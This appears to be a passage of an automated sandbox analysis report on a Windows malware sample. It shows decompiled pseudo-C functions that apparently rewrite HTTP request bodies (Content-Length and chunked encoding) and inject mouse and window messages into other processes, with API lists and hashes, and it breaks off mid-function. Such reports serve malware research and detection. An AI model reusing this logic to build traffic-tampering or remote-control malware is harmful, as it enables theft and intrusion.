				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E0040EEE1();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x4230a0(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x42307c;
					EnterCriticalSection(0x42307c);
					_t101 = E00412696(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x423098;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4337772
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E004163E4(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E0041645B(E004163A8( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x42307c);
					_t107 =  *0x4230a0(_t179, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x42307c);
					_t108 = E00412696(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x423078();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x423098;
						_v36 = _t176;
						if(_t168 > 0) {
							E004163E4( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E00412F1C(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E004130C6( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00414E0E( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E00416378( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E004163E4(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E00416B51(_t199 + 0x28);
											_t188 = E0041B34D(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E004163E4(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E004170DF(_t131, _t177, _t191);
											E004163E4(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E004163E4(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E004163E4(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E004163A8( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E004163A8(_v48);
							}
							_t153 = 0x42307c;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E0041532C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x423098;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4337796
					if(E00416333( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x004132fe
0x00413304
0x00413309
0x0041330e
0x004135fb
0x00413602
0x00000000
0x00413328
0x0041332e
0x00413334
0x00413336
0x0041333e
0x004135f4
0x004135f5
0x00000000
0x004135f5
0x00413347
0x00413351
0x0041358d
0x00413590
0x00413593
0x00413593
0x00413596
0x0041359b
0x004135a7
0x004135ac
0x004135b2
0x004135b5
0x004135c3
0x004135c3
0x004135c9
0x004135cf
0x0041360b
0x00413611
0x00413611
0x0041335b
0x00000000
0x00000000
0x00413362
0x0041336f
0x00413375
0x00413378
0x0041337f
0x004135ee
0x004135ee
0x00000000
0x004135ee
0x00413386
0x00413388
0x0041338d
0x00413392
0x004135d3
0x004135d3
0x004135d5
0x004135da
0x004135da
0x004135e0
0x004135e7
0x004135e8
0x00000000
0x004135e8
0x00413398
0x0041339e
0x004133c2
0x004133c5
0x004133cb
0x004133d1
0x004133de
0x004133e3
0x004133e3
0x004133f0
0x004133f5
0x004133fc
0x00413420
0x00413425
0x0041342c
0x0041344c
0x00413459
0x0041346a
0x0041346c
0x00413472
0x00413481
0x0041348b
0x0041348c
0x004134c8
0x004134e8
0x004134ed
0x004134f2
0x004134f2
0x0041348e
0x0041348e
0x00413495
0x00413497
0x004134a4
0x004134a7
0x004134b3
0x004134b6
0x004134bb
0x004134bf
0x004134bf
0x004134f4
0x004134fb
0x00413510
0x00413510
0x00413515
0x0041351a
0x00413520
0x00413523
0x00413523
0x00413472
0x0041352a
0x0041352f
0x0041352f
0x00413534
0x00413534
0x0041353f
0x00413556
0x00413556
0x00413563
0x00413569
0x0041356f
0x00413575
0x00413578
0x0041357b
0x0041357e
0x00413583
0x00413587
0x0041358a
0x00000000
0x0041358a
0x00413558
0x0041355d
0x00000000
0x00000000
0x00000000
0x00413541
0x00413545
0x00413552
0x00000000
0x00413552
0x00413547
0x00413548
0x00000000
0x00413548
0x0041353f
0x004133a3
0x004133ac
0x004133ae
0x004133b8
0x00000000
0x00000000
0x004133be
0x00000000
0x004133be

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

EnterCriticalSection.KERNEL32(0042307C), ref: 00413334
LeaveCriticalSection.KERNEL32(0042307C), ref: 00413362
EnterCriticalSection.KERNEL32(0042307C), ref: 00413386
LeaveCriticalSection.KERNEL32(0042307C,00000000,?,00000000), ref: 004135C9
LeaveCriticalSection.KERNEL32(0042307C), ref: 004135E8

Part of subcall function 0041B34D: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00423098,?,00000000), ref: 0041B3A7

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

LeaveCriticalSection.KERNEL32(0042307C), ref: 004135F5

Strings

Content-Length, xrefs: 004134D2
|0B, xrefs: 00413534
%x, xrefs: 0041348E
0, xrefs: 004134AE
|0B, xrefs: 0041332E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length$|0B$|0B
API String ID: 4067213518-4079057073
Opcode ID: 1f95c2c750d472dc0308abebbda6a6d93063c3e574f119983c8855ea1cdc97fe
Instruction ID: 6f60bf1c1259f8d79ae8df9fe2bd6c24b24a860f7416bc584747d2028f190a16
Opcode Fuzzy Hash: 1f95c2c750d472dc0308abebbda6a6d93063c3e574f119983c8855ea1cdc97fe
Instruction Fuzzy Hash: 4B91DF72504315BFCB10DF24C98199EBBB9FF84715F01061AF864932A2C738EA95CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041D350, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D350(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E00407C72(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t7 = _t85 + 0x50; // 0x50
					_t9 = _t85 + 0x3c; // 0x3c
					_t86 =  &_v140;
					E0041AA01( &_v140, _t9, _v12, _t7, 2);
					_v5 = E00419B8B( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E0041D1EE(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E004163E4( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						_t35 = _t85 + 0x17c; // 0x17c
						TerminateProcess( *_t35, 0);
						E00417DB7(_t35);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x0041d350
0x0041d350
0x0041d35e
0x0041d365
0x0041d368
0x0041d36d
0x0041d4b9
0x00000000
0x0041d4b9
0x0041d382
0x0041d3b0
0x0041d384
0x0041d386
0x0041d38d
0x0041d394
0x0041d39a
0x0041d3ab
0x0041d3ab
0x0041d3be
0x0041d409
0x0041d410
0x0041d478
0x0041d478
0x0041d482
0x0041d48d
0x0041d49f
0x0041d4b3
0x0041d4b3
0x00000000
0x0041d482
0x0041d41e
0x0041d426
0x0041d43e
0x00000000
0x00000000
0x0041d450
0x0041d465
0x0041d46d
0x0041d473
0x00000000
0x0041d473
0x0041d45c
0x00000000
0x00000000
0x00000000
0x0041d3c6
0x0041d3c9
0x0041d3d8
0x0041d3f4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d3f4

APIs

Part of subcall function 00407C72: GetClassNameW.USER32 ref: 00407C8D

GetWindowThreadProcessId.USER32(?,?), ref: 0041D37A
ResetEvent.KERNEL32(?), ref: 0041D3C9
PostMessageW.USER32(?,?,?,?), ref: 0041D3EC
WaitForSingleObject.KERNEL32(?,00000064), ref: 0041D3FB
ResetEvent.KERNEL32(?,?,?,00000010), ref: 0041D426
PostThreadMessageW.USER32 ref: 0041D436
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0041D448

Part of subcall function 0041AA01: StringFromGUID2.OLE32(00000000,?,00000028,0040EDB5,?,00000010,00000000,77E49EB0), ref: 0041AAA2

Part of subcall function 00419B8B: OpenMutexW.KERNEL32(00100000,00000000,00000000,0040F741,?,19367401,?,00000001,8889347B,00000002), ref: 00419B96
Part of subcall function 00419B8B: CloseHandle.KERNEL32(00000000), ref: 00419BA1

TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 0041D46D

Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DC6
Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DCF

IntersectRect.USER32 ref: 0041D48D
FillRect.USER32 ref: 0041D49F
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0041D4B3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 75886548675cbbb97cf89533a43dc2bf99acfee0b3ca964ee47820301d76ed39
Instruction ID: afc57b47a3688a03d04002354c68740deab08ca308a231b8d10406ea7fb6115a
Opcode Fuzzy Hash: 75886548675cbbb97cf89533a43dc2bf99acfee0b3ca964ee47820301d76ed39
Instruction Fuzzy Hash: D2418170900208BBEF119F60CD85FEA7B78BF04304F0480A6FD44EA1A2D779E995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D31F, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040D31F(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0040801F(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E0040CE91(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E0040CE22(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0040801F(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E0041AADD(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E0040CE22(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E00407C72(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E0040CE22(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E00407C72(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E0040D091(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E0040D091(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040801F(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E0040D091(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E0040D091(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0040801F(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0040801F(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x0040d327
0x0040d329
0x0040d32f
0x0040d339
0x0040d365
0x0040d36b
0x0040d370
0x0040d384
0x0040d372
0x0040d372
0x0040d372
0x0040d33b
0x0040d33f
0x0040d349
0x0040d34e
0x0040d34e
0x0040d356
0x0040d35e
0x0040d35e
0x0040d356
0x0040d38d
0x0040d390
0x0040d396
0x0040d39c
0x0040d3a4
0x0040d628
0x0040d62c
0x0040d62c
0x0040d3aa
0x0040d3ad
0x0040d3ad
0x0040d3b1
0x0040d3ba
0x00000000
0x0040d3bc
0x0040d3bc
0x00000000
0x0040d3bc
0x0040d3b3
0x0040d3b3
0x0040d3bd
0x0040d3c1
0x0040d3c6
0x0040d3c6
0x0040d3c9
0x0040d3c9
0x0040d3cd
0x0040d3d6
0x0040d3e2
0x0040d3e2
0x0040d3e5
0x0040d3e5
0x0040d3e9
0x0040d3f2
0x0040d3fe
0x0040d3fe
0x0040d401
0x0040d40a
0x0040d412
0x0040d418
0x0040d41d
0x0040d420
0x0040d426
0x0040d42b
0x0040d436
0x0040d44d
0x0040d455
0x0040d457
0x0040d45a
0x0040d45a
0x0040d455
0x0040d436
0x0040d45e
0x0040d48d
0x0040d48d
0x0040d492
0x0040d495
0x0040d49d
0x0040d4c2
0x0040d4cc
0x0040d4cc
0x0040d4ad
0x0040d4ad
0x0040d4b0
0x0040d4b7
0x0040d4b7
0x0040d49d
0x00000000
0x0040d460
0x0040d461
0x0040d468
0x00000000
0x00000000
0x0040d46d
0x0040d47f
0x0040d47f
0x0040d484
0x0040d4d1
0x0040d4d3
0x00000000
0x00000000
0x0040d4de
0x0040d4e5
0x0040d4ed
0x00000000
0x00000000
0x0040d4f7
0x0040d4fe
0x0040d504
0x0040d52d
0x0040d506
0x0040d507
0x0040d50e
0x0040d526
0x0040d529
0x0040d510
0x0040d510
0x0040d510
0x0040d50e
0x0040d534
0x0040d548
0x00000000
0x00000000
0x0040d54a
0x0040d54b
0x0040d54c
0x0040d551
0x00000000
0x0040d536
0x0040d536
0x0040d537
0x0040d538
0x0040d53d
0x0040d556
0x0040d556
0x0040d55c
0x0040d55d
0x0040d562
0x0040d567
0x0040d56b
0x0040d57f
0x0040d59e
0x0040d5a2
0x0040d5b6
0x0040d5d5
0x0040d5d9
0x0040d5f3
0x0040d5f3
0x0040d5ff
0x0040d622
0x0040d622
0x00000000
0x0040d5ff
0x0040d5b8
0x0040d5b9
0x0040d5ba
0x0040d5bf
0x0040d5c4
0x0040d5c4
0x0040d5ca
0x0040d5cb
0x0040d5d0
0x00000000
0x0040d5d0
0x0040d5a4
0x0040d5a5
0x0040d5a6
0x0040d5ab
0x00000000
0x0040d5ab
0x0040d581
0x0040d582
0x0040d583
0x0040d588
0x0040d58d
0x0040d58d
0x0040d593
0x0040d594
0x0040d599
0x00000000
0x0040d599
0x0040d56d
0x0040d56e
0x0040d56f
0x0040d574
0x00000000
0x0040d574
0x0040d534
0x0040d45e
0x0040d3f4
0x0040d3f5
0x0040d3f9
0x00000000
0x0040d3f9
0x0040d3eb
0x00000000
0x0040d3eb
0x0040d3d8
0x0040d3d9
0x0040d3dd
0x00000000
0x0040d3dd
0x0040d3cf
0x00000000
0x0040d3cf

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0040D42B
GetParent.USER32(00000000), ref: 0040D44D
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D472
IsWindow.USER32(?), ref: 0040D495

Part of subcall function 0040CE91: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040CEA5
Part of subcall function 0040CE91: ReleaseMutex.KERNEL32(?), ref: 0040CEC4
Part of subcall function 0040CE91: GetWindowRect.USER32 ref: 0040CED1
Part of subcall function 0040CE91: IsRectEmpty.USER32(?), ref: 0040CF55
Part of subcall function 0040CE91: GetWindowLongW.USER32(?,000000F0), ref: 0040CF64
Part of subcall function 0040CE91: GetParent.USER32(?), ref: 0040CF7A
Part of subcall function 0040CE91: MapWindowPoints.USER32 ref: 0040CF83
Part of subcall function 0040CE91: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040CFA7

GetWindowInfo.USER32 ref: 0040D4E5
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040D622

Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D

Strings

, xrefs: 0040D3C9
@, xrefs: 0040D57B
<, xrefs: 0040D4DE

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: 8716e975723d80b5c29e6d0ac0f0769a9059d89c8116fa46040e2e6edf10abba
Instruction ID: 1ef8d9956b424b20c8a87b1457cc90fb2a58313426d9740db7aa97ef6c1182e1
Opcode Fuzzy Hash: 8716e975723d80b5c29e6d0ac0f0769a9059d89c8116fa46040e2e6edf10abba
Instruction Fuzzy Hash: EF91A170E00309BAEB219F94CC85BBF7BB5AB41708F14403AFD41762D1C7B89989D759

Uniqueness

Uniqueness Score: -1.00%

Function 00413CAD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00413CAD(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0040EDBB(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E0040EEE1();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E00419B7B(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E00413E8F(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E00413B58( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E00413F4A( &_v124);
							_v78 = _t94;
							E00413FA2( &_v128);
						}
						_v144 =  *0x42305c;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E0041974B(_t59, _v156);
							E0041974B(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t39 =  &_v168; // 0x413be0
